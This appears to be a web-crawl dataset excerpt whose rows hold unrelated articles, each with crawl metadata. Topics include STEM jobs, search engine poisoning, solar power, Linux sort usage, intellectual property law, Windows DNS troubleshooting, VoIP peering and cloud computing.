text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
Here Is a Hint Invest In STEM Workers
July 6, 2013
Have you ever heard of a STEM (science, technology, engineering, and math) worker? Probably not, but Brookings.edu reports in the article, “The Hidden STEM Economy” that 20% of the twenty-six million jobs in the US are in the STEM field. Since the economic downfall, recovery has been concentrated on workers with at least a bachelor’s degree. Most STEM jobs do not require a four-year college degree and have a high payout. Even if a worker has a degree in a STEM field the pay grade is much higher.
In a STEM based economy, job growth, wages, patenting, exports, and employment rates are much higher. Another positive factor is a larger concentration of these jobs means less income inequality. Where is the government in all of this?
“Of the $4.3 billion spent annually by the federal government on STEM education and training, only one-fifth goes towards supporting sub-bachelor’s level training, while twice as much supports bachelor’s or higher level-STEM careers. The vast majority of National Science Foundation spending ignores community colleges. In fact, STEM knowledge offers attractive wage and job opportunities to many workers with a post-secondary certificate or associate’s degree. Policy makers and leaders can do more to foster a broader absorption of STEM knowledge to the U.S workforce and its regional economies.”
What can we learn from this? Invest in this end of the workforce! It also points to technology being on the growing side (again), which means new innovation in information retrieval.
Whitney Grace, July 06, 2013 | <urn:uuid:9b3e4606-f30d-4bc8-afc2-984ab13d5068> | CC-MAIN-2017-09 | http://arnoldit.com/wordpress/2013/07/06/here-is-a-hint-invest-in-stem-workers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00574-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.95188 | 346 | 2.8125 | 3 |
Search Engine Poisoning: On The Rise
Today, Imperva released a report on search engine poisoning. Search Engine Poisoning attacks manipulate, or “poison”, search engines to display search results that contain references to malware-delivering websites. There are a multitude of methods to perform SEP: taking control of popular websites; using the search engines’ “sponsored” links to reference malicious sites; and injecting HTML code. Here’s a graphic and a video explaining how it works:
How has hacker interest in SEP grown? This is very difficult to gauge and formal statistics do not exist quantifying the problem. However, as the recent Bin Laden death reminds us, hackers leverage current events as they happen to dupe search engine users. The first description of the attack by researchers was in March 2008, by Dancho Danchev. One metric that helps understand the growth of this problem? Look at hacker forum discussions. For example, one major hacker forum saw a dramatic increase in discussions regarding search engine poisoning with XSS:
Year over year growth of SEP discussions in hacker forums: Percent growth
2008 - 2009 212%
2009 - 2010 121%
Year over year growth of SEP discussions in hacker forums: Raw numbers
How does Imperva detect SEP? Our probes were able to detect and track a SEP attack campaign from start to end. The prevalence and longevity of this attack indicates not only how long it lasted undetected, but also that companies are not aware they are being used as a conduit of an attack. It also highlights that search engines should do more to improve their ability to accurately identify potentially harmful sites and warn users about them.
The attack method we monitored returned search results containing references to sites infected with Cross Site Scripting (XSS). The infected Web pages then redirect unsuspecting users to malicious sites where their computers become infected with malware. This technique is particularly effective as the criminal doesn’t take over, or break into, any of the servers involved to carry out the attack. Instead he finds vulnerable sites, injects his code, and leaves it up to the search engine to spread his malware.
The prevalence of this attack has ramifications for search engines, especially Google. Current solutions which warn the user of malicious sites lack accuracy and precision whereas many malicious sites continue to be returned un-flagged. However, these solutions can be enhanced by studying the footprints of a SEP via XSS. This allows a more accurate, and timely notification, as well as prudent indexing. We hope Google and Yahoo! step up.
Authors & Topics: | <urn:uuid:78229175-2548-4dce-9d41-79b15e0a5974> | CC-MAIN-2017-09 | http://blog.imperva.com/2011/06/search-engine-poisoning-on-the-rise.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00098-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.935108 | 533 | 2.59375 | 3 |
Governor Arnold Schwarzenegger today participated in the launch of Ausra's Kimberlina Solar Energy Facility in Bakersfield. The five megawatt (MW) solar thermal power plant, the first to come online in California in more than 15 years, is a demonstration facility for utility-scale thermal solar energy plants, such as the one Ausra is building in San Luis Obispo. That project will be a 177 MW solar thermal power plant whose energy PG&E has already agreed to purchase.
"We're proving that cost competitive solar thermal power at utilitiy scale is real. It works and is now reliably supplying power to California," Ausra chief executive officer, Bob Fishman said.
Ausra's steam production technology can save customers millions of dollars in fuel costs, according to Fishman. Pressured steam can also augment power at conventional power plants, cutting costs and reducing their carbon footprint. It works by using large fields of mirrors to heat water in pipes that gets turned into steam. The steam is then used to drive turbines that generate power. And in addition to being used to generate power, the steam from the Kimberlina solar-thermal energy plant can also be used in such industrial processes as oil recovery and refinery, food processing and paper manufacturing. And these new solar-thermal energy plants use a fraction of the land of other solar-thermal technology implementations, Fishman said.
"This next generation solar power plant is further evidence that reliable, renewable and pollution-free technology is here to stay, and it will lead to more California homes and businesses powered by sunshine," Governor Schwarzenegger said. "Not only will this large-scale solar facility generate power to help us meet our renewable energy goals, it will also generate new jobs as California continues to pioneer the clean-tech industry."
Ausra's Kimberlina facility will employ seven full-time operators. When at full capacity, it will produce enough solar energy to power more than 3,500 homes. Ausra's larger, utility-scale San Luis Obispo facility will employ 350 Californians during construction and create 70 long-term jobs.
The Governor has set a goal of increasing California's renewable energy sources to 20 percent by 2010, and he supports reaching 33 percent by 2020. California's push to increase renewable energy and fight climate change will also boost our economy. According to an economic study released on Monday by the University of California at Berkeley and Next 10, California's policies will create as many as 403,000 jobs in the next 12 years and household incomes will increase by $48 billion. A separate economic study by Navigant Consulting, Inc. estimated that 214,000 permanent jobs in the solar energy sector alone will be generated in California.
"My vision is that when I fly up and down the state of California that I see every available space blanketed with solar-if it is parking lots, if it's on top of buildings, on top of prisons, universities, government buildings, hospitals. That is my goal," Gov. Schwarzenegger said at the launch of the power plant in Bakersfield.
On Tuesday, the governor announced that California has partnered with SunEdison to provide a zero-emission 8 MW solar photovoltaic power system to 15 California State University campuses. Further development is also under way by state departments, including the Department of General Services, Department of Corrections and Rehabilitation and Department of Mental Health, to generate approximately 7 MWs of solar power at five state prison sites and three state mental hospitals. Since 2006, 4.2 MWs of solar power have already been deployed at eight other state facilities through similar power purchase agreements.
To make solar power more accessible to California homeowners, the Governor signed his Million Solar Roofs Plan into law in August 2006. Now known as the California Solar Initiative, it will provide 3,000 MWs of additional clean energy and reduce the output of greenhouse gases by three million tons, equivalent to taking one million cars off the road. The $2.9 billion incentive plan for homeowners and building owners who install solar electric systems will lead to one million solar roofs in California by the year 2018. | <urn:uuid:fa520d5d-5332-4607-9a51-a62ce7d816ad> | CC-MAIN-2017-09 | http://www.govtech.com/technology/Solar-Energy-Plant-Comes.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00274-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.947709 | 841 | 2.703125 | 3 |
Years ago, many companies relied on a perimeter defense strategy, assuming that would be enough to protect their network. But in today’s cyber-security landscape, threats can just as easily come from inside the network. According to the IBM 2015 Cyber Security Intelligence Index, 55 percent of all attacks were carried out by either malicious insiders or inadvertent actors. For example, modern malware can be unwittingly downloaded onto a remote employee’s laptop, lie dormant until the employee reconnects to the corporate network, and then spread to other endpoints on the network.
Network segmentation is key to containing the damage from such cyber threats. By creating different network segments and enabling employees to access only the information and servers based on their role, an organization can prevent the malware from spreading laterally to other endpoints and servers with sensitive data. Network segmentation provides the essential layer of security designed to protect valuable corporate assets from unauthorized access. | <urn:uuid:6400e0d8-afcb-4f65-abd3-8fb06c118c8f> | CC-MAIN-2017-09 | https://www.bradfordnetworks.com/control/network-segmentation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00274-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.929714 | 186 | 2.734375 | 3 |
Linux sort command - Sort lines of text files
Himanshuz.chd 270004408M Visits (79435)
man page of sort command:
So we see that the main purpose of this command is to produce a sorted output.
Linux sort command examples
1. A basic exampleThe very first input that I tried consisted of some random alphabets.
Here is what I tried:
$ sort b z a w sAnd here is the output :
a b s w zSo we see that the output produced was in sorted form.
2. Sort numbersIn the following example, I filled a text file (sort.txt) with some random numbers.
$ cat sort.txt 8 2 6 1 5 3Then I used the sort command with sort.txt as input file to the command.
$ sort sort.txt 1 2 3 5 6 8So we see that sorted list of numbers was produced in output.
3. Sorting wordsIn this example, the sort.txt file is filled with some words.
$ cat sort.txt UK Australia Newzealand Brazil AmericaNow, this file is given as input to the sort command:
$ sort sort.txt America Australia Brazil Newzealand UKSo we see that words were sorted according to dictionary ordering. Even the words beginning with same alphabet were sorted according to succeeding alphabets.
4. Use sort to directly write data in sorted mannerThis command can be used to write unsorted input data to a file directly in sorted manner.
Here is how this can be done :
$ sort > sort.txt 9 Hello 4 Why 8 ByeAfter the above operation, let's check the file contents :
$ cat sort.txt 4 8 9 Bye Hello WhySo the output suggests that the input was first sorted and then written to file.
5. Write sorted concatenation of all input files to standard outputIf more that one file is provided as input, the sort command produces a sorted concatenation on stdout.
Here is an example:
$ cat sort1.txt 7 4 9 1
$ cat sort2.txt 8 5 6 2Here is the output :
$ sort sort1.txt sort2.txt 1 2 4 5 6 7 8 9So we see that a sorted concatenation was produced in output.
6. Write result of sort in a fileThe output of sort command can be written to a file by using -o option.
Here is how it's done :
$ sort -o sort.txt 4 9 2 8 1Now let's check the file :
$ cat sort.txt 1 2 4 8 9So we see that the output was actually written to the file whose name was supplied as input to sort through -o option.
7. Sort monthsThere is an interesting option -M through which the month names can be sorted.
Here is an example :
$ sort -M > sort.txt DEC JAN FEBNow, let's check the file contents for output :
$ cat sort.txt JAN FEB DECSo we see that sort command actually sorted the month names.
8. Sort human readable numbersAnother interesting option -h is provided by sort command through which human readable numbers.
Here is an example :
$ sort -h > sort.txt 2G 1K 3MNow, let's check the file for output:
$ cat sort.txt 1K 3M 2GSo we see that the numbers were sorted.
9. Produce reverse sorted resultsUsing -r option provided by sort command, the results can be produced in reverse order.
$ sort -h -r > sort.txt 2G 1K 3MHere is the output of file :
$ cat sort.txt 2G 3M 1KSo we see that this time the sorting results were written in reverse sorted order.
10. Compare according to string numerical valueThis can be done using -N option.
Here is the input :
$ cat > sort.txt 7 mangoes 4 oranges 9 grapes 1 appleHere is the output :
$ sort -n sort.txt 1 apple 4 oranges 7 mangoes 9 grapes | <urn:uuid:0a917528-2b15-4388-843b-2d8f7f412af2> | CC-MAIN-2017-09 | https://www.ibm.com/developerworks/community/blogs/58e72888-6340-46ac-b488-d31aa4058e9c/entry/linux_sort_command_sort_lines_of_text_files9?lang=en | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00626-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.8708 | 868 | 3.234375 | 3 |
The recently shelved SOPA (Stop Online Piracy Act) and PIPA (PROTECT-IP Act) bills that were up for consideration in the U.S. Congress have once more brought to the forefront a touchy subject, particularly with regard to the Internet: intellectual property (IP). With IT becoming such a critical underpinning of the U.S. and world economies, a frank reconsideration of the meaning and role of IP is long overdue.
Re-evaluating Assumptions About Intellectual Property
One missing item on the agenda of discussing IP legislation like SOPA and PIPA revolves around the meaning, scope and legal status of the term intellectual property. This article is by no means intended to resolve the issue, but merely to point out some considerations that suggest that the predominant conception of IP may well be flawed. Stopping draconian bills like SOPA and PIPA was necessary for reasons having nothing to do with IP, but in anticipation of the next round of legislation (and it will arrive sooner or later), an honest discussion of intellectual property is desperately needed.
IP laws are ostensibly intended to protect the nonmaterial goods produced by individuals and companies. In the context of IT and data centers, such goods encompass software, innovative design practices or devices, and product/company names and logos (which also applies beyond these industries). By prohibiting others from simply copying, by whatever means, these protected items, those who developed them are enabled to earn a return on their invested labor and capital. But like so many concepts that sound good on paper, IP can also be abused.
Examples of copyrights and patents (legal recognitions of IP) range from the understandable to the downright absurd. For instance, it’s easier to believe that a musician has the right to control distribution of a recording he or she made than it is to believe that a company has the right to patent human genes (“How human genes become patented”)—which, incidentally, that company did not create. Similarly, some companies have gained patents on seeds, imposing legal restrictions on farmers’ ability to collect and use seeds from the next generation (“Saving Seeds Subjects Farmers to Suits Over Patent”). But where is the line to be drawn between a common-sense use of IP law and a patently (no pun intended) absurd use?
Complicating the situation is the digital nature of information—music, software, images, text and so on. To computers, these are nothing but long binary numbers (010011101011100010011...). Can a company or individual own the rights to a binary number? But what if two programs use the same binary number for two different things—one to play back a song, one to produce an image? (This is an unlikely occurrence, but it’s conceivable.) And how much of the number is actually owned? For example, if one or two bits are reversed, is it the same number for IP purposes?
And even if we look at the actual content rather than the underlying digital numbers—the notes of music, the shapes and colors of an image, the words of a text, and so on—how much difference is enough difference to objectively avoid legal jeopardy in regard to infringement of IP rights? Are IP rights applicable when no commercial benefit is gained? For example, the Girl Scouts were asked to pay to be able to sing certain tunes around the campfire (“Ascap Asks Royalties From Girl Scouts, and Regrets It”). Again, the extent of IP rights is far from clear: common sense would tend to find more favor in protecting a musician’s recording (say, in MP3 format) than in preventing some Girl Scouts from singing some hit tune among themselves.
SOPA and PIPA Highlight Need for Frank Discussion
The SOPA and PIPA bills were ostensibly intended to protect IP rights on the Internet, but the recent shutdown of Megaupload proves that these bills weren’t really needed to enable enforcement of IP rights on the Internet. (For a simple discussion of the real problems with SOPA and PIPA, see the Khan Academy’s lucid presentation.) What these bills do illustrate is an overboard reaction to IP infringement on the Internet. And similar bills content will continue to come up in the Congress until one of them passes, unless a clearer understanding of what constitutes IP and IP rights is developed.
Although the fact that IP laws are violated regularly by a large number of Internet users doesn’t mean that those laws are unwarranted, it does raise some question about whether the laws do not somehow miss the reality of the digital situation. In some sense, the question really does come down to whether an artist, musician, programmer or other individual can own a number—or, more to the point, whether he or she can control what others do with that number.
The Economics of IP
Intellectual property is an attempt to extend the concepts that apply in the realm of physical possessions to the realm of concepts, ideas and other immaterial things. When you take someone’s car, you’re taking a one-of-a-kind object (there’s only one of that exact car in existence)—the violation in this case is tangible, and the stolen item is irreplaceable (in the sense that there’s only one “that car”). But what about a software program in digital format? Innumerable copies can be created in a manner that has no effect on the physical ownership of the original by the programmer, company or whomever has it.
Thus, from the perspective of the owner in exclusive terms of physical/digital possessions, nothing has changed. Of course, the counterargument is the uncontrolled duplication of the program has an economic effect: it essentially eliminates any monetary value to the program (or whatever the item—by the laws of economics, an infinite supply means the price must fall to zero). The owner could then state that although the program wasn’t stolen, its value was.
But granting that actions that reduce the monetary value of an object are no less than theft, one opens a can of worms that effectively leads to necessary regulation of all economic activity. For example, say two programmers write two different programs that do exactly the same thing (but, to avoid IP considerations, they do it in two entirely different ways). Assume the value of these two programs is thus equivalent in this sense. But if one programmer offers his version for sale at half the price of the other—killing the sales of the more expensive version—is that programmer, in effect, “stealing value” from the other?
This small example illustrates the kind of economic and philosophical morass that a discussion can fall into with regard to IP. This is not, however, to say that IP has absolutely no place in the law or common morality—nor is it to say that IP has a definite place in the same. This is simply to note that an unquestioning allegiance to the prevailing notions of IP (particularly when purveyed by large corporations with huge financial stakes in the discussion) can lead to absurdities, like companies owning the rights to your genes.
What we need, therefore, is a healthy debate on the topic of IP. This debate shouldn’t be limited to laws like SOPA and PIPA, but should focus on what truly constitutes IP and whether the law has a role. The debate need not be just a revolutionary exercise in tearing down an established dogma, but should be a means for both sides to clarify their positions and, one would hope, reach a broader consensus. At that point, any necessary laws can be passed to protect both rights holders and everyone else.
Photo courtesy of Kevin Spencer. | <urn:uuid:d58426c1-77c7-422c-b4c8-cddeacaf2dec> | CC-MAIN-2017-09 | http://www.datacenterjournal.com/aftermath-of-sopa-and-pipa-lets-talk-ip/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171416.74/warc/CC-MAIN-20170219104611-00446-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940733 | 1,594 | 2.515625 | 3 |
Troubleshoot Windows DNS Problems
In any enterprise, DNS services are a crucial backbone for network connectivity. DNS is used for name resolution, allowing one client to locate another client. If DNS fails, it will disrupt connectivity to the Internet. In this article, we'll consider some common issues caused by misconfiguration of DNS.
Incorrect Configuration of Primary/Secondary Zones
Creating a new zone, whether primary or secondary, is just a matter of few clicks. However there are other settings that you might want to check to ensure that DNS is working properly.
Zones are not replicating
You have created a new zone, but for some reason it is not replicating with the primary zone. There might be many reasons for this, but here are some possibilities:
- Zone Transfers are enabled and the secondary DNS server IP is not specified. As a best practice, it is always recommended to specify the IP addresses of the servers that will need to download the zone data from the primary zone. See Figure 1.
- Secure Dynamic Updates are enabled, and the secondary zone does not have Active Directory DNS Integrated Zones configured. Secure Dynamic Updates only works if both DNS servers are running in Active Directory Integrated DNS Zones. If either the DNS server is not on Active Directory Integrated DNS Zones, or running on BIND (Linux), then Dynamic Updates need to be set to Non-Secure. See Figure 2.
Figure 1: Zone Transfers is enabled and only replicating to a specific server.
Figure 2: Dynamic Updates is set to Secure by default for Windows Server DNS.
Users are not able to do DNS queries from your DNS Server
You have done the basic troubleshooting, and users were able to ping to the DNS server with response. However when they tried to query specific DNS zones which is hosted on your DNS server, it fails. In this case, you might want to check:
- The "Everyone" group does not have read permission for the zone. Due to misconfiguration, the "Everyone" group might not have the necessary permission entries for the DNS zone. See Figure 3.
Figure 3: Everyone group has permission to read and list the content of the Zone
User PCs are not registering into the DNS zone
A user's PC is able to connect to the network, but the computer name does not get registered in the DNS server. Three common possibilities are:
- The TCP/IP settings properties window does not have Register this connection's addresses in DNS selected. This option will ask the DNS client to register the computer name into the DNS server. See Figure 4.
- Authenticated Users group does not have the correct permission set for the DNS zone. Authenticated Users group needs to have the permission to create child objects for the DNS zone. See Figure 5.
- DNS Dynamic Updates is not enabled in DHCP settings. To be exact, the DNS client will ask the DHCP Server to create an A and PTR record in the DNS Server. Hence, the DHCP Server will need to have the Enable DNS dynamic updates according to the settings below selected. See Figure 6.
Figure 4: Register this connection's addresses in DNS must be selected.
Figure 5: Authenticated users group must have permission to Create All Child Objects, else it will not create an A record in the DNS Server.
Figure 6: Enable DNS Dynamic Updates in DHCP settings.
DNS Server configuration
If the DNS server is not configured properly, the entire DNS service will be affected. Here are some common configuration issues administrators should look out for:
DNS queries not responding with any response
Assuming that Internet connectivity from the DNS server to the outside world is still good, the problem could lie with the forwarder or root hints. Here's why:
- Forwarder DNS servers are down. Depending on your network configurations, you might have set up forwarder DNS. If all of the forwarder DNS servers are down, this will affect the DNS server at your site. See Figure 7.
- Root Hints are missing. Or root hints servers are down. Root hints allow DNS queries to be resolved by using the Root DNS Server, without using an intermediate DNS server, or a forwarder. See Figure 8.
Figure 7: Configure Forwarders in DNS Server.
Figure 8: Root Hints name servers are shown in this list.
DNS is Important
DNS is crucial in every corporate environment, whether for internal or external hostname resolution. The above configuration issues are not exhaustive, but do include some of the most common problems administrators miss during routine monitoring and troubleshooting. Do you have any other DNS tips that you would like to share? Post them below!
Jabez Gan is a Microsoft Most Valuable Professional (MVP) and is currently the Senior Technical Officer for a consulting company that specializes in Microsoft technologies. His past experience includes developing technical contents for Microsoft Learning, Redmond, Internet.com and other technology sites, and deploying and managing Windows Server Systems. He has also spoken in many technology events which includes Microsoft TechEd Southeast Asia.A contributing author for MCTS: Windows Server 2008 Application Platform Configuration Study Guide by Sybex, he is often sourced to act as a subject matter expert (SME) in Windows server and client technology.He can be reached at firstname.lastname@example.org | <urn:uuid:b5724d66-a970-41d0-9abf-101871a91160> | CC-MAIN-2017-09 | http://www.enterprisenetworkingplanet.com/print/netos/article.php/3934066/Troubleshoot-Windows-DNS-Problems.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171416.74/warc/CC-MAIN-20170219104611-00446-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.912844 | 1,099 | 2.65625 | 3 |
Teachers in Pennsylvania are being encouraged to use increasing amounts of technology in the classroom. The downside to this trend is the increased risks that students face online by accessing inappropriate or potentially harmful content.
There’s no doubt that the increased use of technology in Connecticut classrooms enhances students’ learning. As a district technology coordinator in Connecticut, how can you ensure your students are safe online and acting responsibly? Anti-bullying policies and blocking, you may cry. But is this enough?
As mobile devices infiltrate school, work, and personal life, we live in a society that is ‘always on’, with constant access to information. This trend presents school districts in Georgia with the challenge of ensuring all students remain safe online.
As school districts in Oregon continue to invest in technologies such as Chromebooks to enhance learning, the chance of students’ exposure to online risks is increasing. What can schools in Oregon be doing to ensure their students are safe? | <urn:uuid:9cbd5425-c27d-43f3-be7e-3bc536295ac3> | CC-MAIN-2017-09 | https://www.imperosoftware.com/tag/internet-safety/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172017.60/warc/CC-MAIN-20170219104612-00146-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.946693 | 195 | 3.296875 | 3 |
The VoIP Peering Puzzle�Part 1: Concepts and Challenges
If you've been reading Enterprise VoIPplanet.com, you have doubtless come across the term VoIP peering; it is certainly among the top buzzwords in today's networking culture.
Webster's defines peer as "one that is of equal standing with another." But to fully understand the concepts of VoIP peering, we must roll back the clock a century or so, and examine the architecture of the first telephone systems.
Alexander Graham Bell's invention of the telephone in 1876 was initially available to a limited fewthose who could afford not only the telephone instrument, but physical connections to others that possessed similar technical foresight and economic means. Switching systems had not yet been developed, so if Dr. Smith needed a telephone line to Pharmacist Jones, a physical cable was installed between their respective locations to make that connection.
With that physical connection established between Smith and Jones, they became peers, or individuals with equal standing with anotherat least as far as communicating by telephone was concerned.
Unfortunately, if either Smith or Jones wanted to consult with Dentist Brown, additional lines would have to be constructed, and before long, large cities such as New York, were draped with telephone poles and cables connecting various locations of the rich and famous.
Switching systems changed the telephone network from a point-to-point to a point-to-multipoint topology, and over time gave rise to the interconnection of central offices and switching systems that comprise the Public Switched Telephone Network, or PSTN, that we know today.
Fast forward a century, and we see that the packet-based Internet Protocol (IP), has emerged as the dominant communications medium. Many organizations, from small businesses to large, multi-location enterprises, have embraced IP as their data transport protocol of choice, creating both local and wide area networks (LANs and WANs) all based upon an IP infrastructure.
However, since they are not connected by a ubiquitous IP grid, these networks are frequently referred to as IP Islands, and communication between islandsnot to mention with much of the outside worldrequires additional connectivity.
For example, an enterprise, with, say, one location in New York and another in Chicago, could procure a high speed leased line, such as a T1or T3 circuit, from an inter-exchange carrier to connect its two "islands". However, in doing so, it would be doing little more than recreating the point-to-point network of Alexander Graham Bell's era. As long as you only want/need to talk with people within your privately interconnected island network, the enterprise VoIP system can stand alone.
However, as soon as you need to speak with someone in the outside world (often referred to as an "off-net call"), your inter-island connections no longer get the job done. To get off your archipelago, you need a ubiquitous bridging connection. Historically, this has been provided by the PSTN, and that PSTN connection can become the limiting factordictating the cost, quality and application support for the end-to-end connection.
Making VoIP the best it can be
Thus, if the PSTN connection between VoIP islands is replaced with an IP network, several immediate benefits emerge.
- First, the "per minute" charges associated with the PSTN go away, since IP networks transmit information in packets, independent of the connection time.
- Second, the hardware costs associated with IP-to-PSTN gateways are eliminated.
- Third, the related signal degradation, owing to the multiple signal format conversions that occur when the IP network connects to/from the PSTN is eliminated, which should improve the voice quality.
- Fourth, multimedia applications, such as video conferencing, which might not be able to traverse the PSTN because of bandwidth constraints, can now flow on an end-to-end basis.
There are two different types of peering arrangements.
The first is called bilateral peering, in which two locations are connected in a point-to-point topology with an IP network. In this case, the two peers may be two locations from the same enterprise, or two locations from two distinct enterprises (such as trading partnersfor example, a manufacturer and supplier) that have a significant amount of inter-network traffic. Some agreement is reached between the various parties to share the costs of the connection.
The second type of peering arrangement is a called multilateral peering, also known as federation peering. This arrangement is similar to a star topology network, in which the islands all connect to a central location, typically a provider of peering services.
Peeringgood, but not simple
As might be expected, the peering relationship is not as simple as just plugging one network into another. Much like other computer and communications architectures, there are a number of issues that must be addressed:
- The physical media for interconnection, such as a fast Gigabit Ethernet backbone.
- Signaling, or call setup (establishment) and teardown (disconnect) messages that are transmitted from the sender to the receiver. Different networks use varying signaling protocols, which requires a meeting of the minds (protocol conversion) before an end-to-end connection can be successful.
- Registry services, with databases to cross-reference telephone numbers and IP addresses.
- Business issues, defining pricing, billing, traffic reporting, and other contractual terms between the parties.
- Location services, identifying where the desired application is located.
- Network security, preventing network topology information, or other proprietary information, from inappropriate disclosure.
- Government compliance, assuring that access to emergency services (E911) and law enforcement call monitoring functions can be maintained.
- End-to-end quality of service, or QoS, as the original voice signal undergoes various format conversions from the original analog to digital to the recipient analog, perhaps traversing multiple IP-TDM-IP network connections in route.
- Identity notification, such as Caller ID.
- Preventing unwelcome calls, known as Spam over Internet Telephony (SPIT)
- Adherence to emerging standards, thus minimizing multi-vendor interoperability issues.
These, and other issues must be addressed in order to implement a successful peering operation, and will be examined in future tutorials. Our next tutorial will look at the developing standards for VoIP peering, beginning with the network peering architecture developed by the Internet Engineering Task Force (IETF).
Copyright Acknowledgement: © 2006 DigiNet ® Corporation, All Rights Reserved
Mark A. Miller, P.E. is President of DigiNet ® Corporation, a Denver-based consulting engineering firm. He is the author of many books on networking technologies, including Voice over IP Technologies, and Internet Technologies Handbook, both published by John Wiley & Sons. | <urn:uuid:59c2a495-9085-4999-904e-f2e903e4c857> | CC-MAIN-2017-09 | http://www.enterprisenetworkingplanet.com/print/unified_communications/The-VoIP-Peering-Puzzle151Part-1-Concepts-and-Challenges-3644066.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00090-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.948615 | 1,430 | 3.015625 | 3 |
Rob Charlton, CEO, Space Group & Adam Ward, Director, BIM Technologies
In an age of perpetual advancing technology, it’s often difficult to keep up with what’s going to be the “next big thing”.
Traditional construction methods are fast being overtaken by modern building processes, and what we’re now terming; digital construction.
As industry innovators, we’re championing the leap from digital construction to augmented construction. There is scope for augmented reality to play a major role in helping construction teams in the field understand how various systems and components fit together during production. But more importantly, it can facilitate a route for architects to take their designs into a virtual environment before the high risk move to construction.
The current process for a structure is that it is designed in 3D, transferred to 2D documents and then built in a virtual
3D format. The transition from 3D to 2D and back again can often lead to errors, therefore, what if we could cut this middle step out altogether?
Just imagine being able to put on an AR headset and see exactly which line on a 2D construction document corresponds to a given object, such as a section of pipe or cable network. Being able to bring drawings into a physical model, giving a sense of scale, proportion, form and space.
In this webinar, we’ll take you through the following:
What is Augmented Construction
Technological advancements and what benefits they bring to the industry
How to use AR effectively
What role does data play in this?
Example projects, who’s using this now
The next step | <urn:uuid:146b0984-1381-414f-a116-c110841236b5> | CC-MAIN-2017-09 | https://www.brighttalk.com/webcast/14607/223683 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170875.20/warc/CC-MAIN-20170219104610-00442-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.927072 | 342 | 2.671875 | 3 |
Cloud computing is making infrastructural breakthroughs on the roads even as the term ‘infrastructure’ becomes more tech and virtual than its original meaning. Even if one hears of Infrastructure as a Service (IaaS) in computer matters, pretty often, it might be soon possible to think out of the box and attach it to the physical tarmac. In Europe, for example, plans are under way to ensure that the operability of transcontinental routes improves. Small operators will be able to collaborate with large consortiums to make use of every means of transport possible be it road or rail.
Surface travel that makes use of trucks or locomotives to convey bulky merchandise, in a single trip, can help enhance operability. Several small-scale suppliers can convene to use a single stretch of road without paying undue duties to transport the same by various means. This is because cloud computing will enable them to select a given route on the map, as well as help to bring together various suppliers who can decide on a given large carrier to convey their goods in one volley. This will echo economies of scale: where many large containers that are almost empty are on the road, simultaneously, one can have several suppliers communicate and collaborate on a single trailer to do a job that many half-empty carriers will do expensively.
Cloud computing is also helping to improve safety concerns on the road. The latest breakthrough is in Ireland where a student grouping has received recognition for its efforts to alert reckless drivers via an innovative gadget. It uses the same mechanics of storing data and displaying it like the conventional cloud. The gadget’s sensors on the engine of the vehicle can relay information about possible crossings (in an area where intersections number 29 in a stretch of 7KM) and thus reduce casualties.
Maps such as those on Google may also be quite handy at evangelizing the rules of the road. When drivers are faced with route decisions, they only have to consort the maps to get data about the most convenient to use. The same case applies to situations where an emergency has occurred on the only way that the chauffeur knows while gridlocked in a traffic jam. It will only take an eye tour of the map, on display, to study the inner streets to negotiate the way out of the snarl up and thus reach the destination in time.
Finally, roads may no longer have to be a headache to chauffeurs if driverless vehicles make it big time. There are now California-based manufacturers who are testing these on public routes. The premise of their possible mass use in the future is that they will overcome traffic because they will keep in tandem with each other, thus shunning human-inspired overlapping. Needless to say, they may even overcome the problem of over-speeding, waiting at termini and the like habits of the modern vehicle possible to cause passengers migraine. Their sophisticated road-smart technologies will help them book appointments with passengers and drive at an optimal speed.
If infrastructure will ever return to its original meaning, namely the road network, it will be courtesy of breakthroughs in cloud computing. However, that will only come to be if the WHO prediction that by 2020 monthly accident figures in the globe will have reached one hundred and fifty thousand, does not turn into a reality. This will also happen when mileage and carrier information will be as comprehensively documented, all over the world, as the United States currently does.
By John Omwamba | <urn:uuid:10293297-6f6f-4cfb-95b0-5bb9423da907> | CC-MAIN-2017-09 | https://cloudtweaks.com/2013/04/cloud-computing-may-fast-track-road-operability/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00618-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.951611 | 702 | 2.890625 | 3 |
Kitamura A.,Japan Atomic Energy Agency |
Kitamura A.,Geological Isolation Research and Development Directorate |
Kurikami H.,Japan Atomic Energy Agency |
Kurikami H.,Geological Isolation Research and Development Directorate |
And 21 more authors.
Nuclear Science and Engineering | Year: 2015
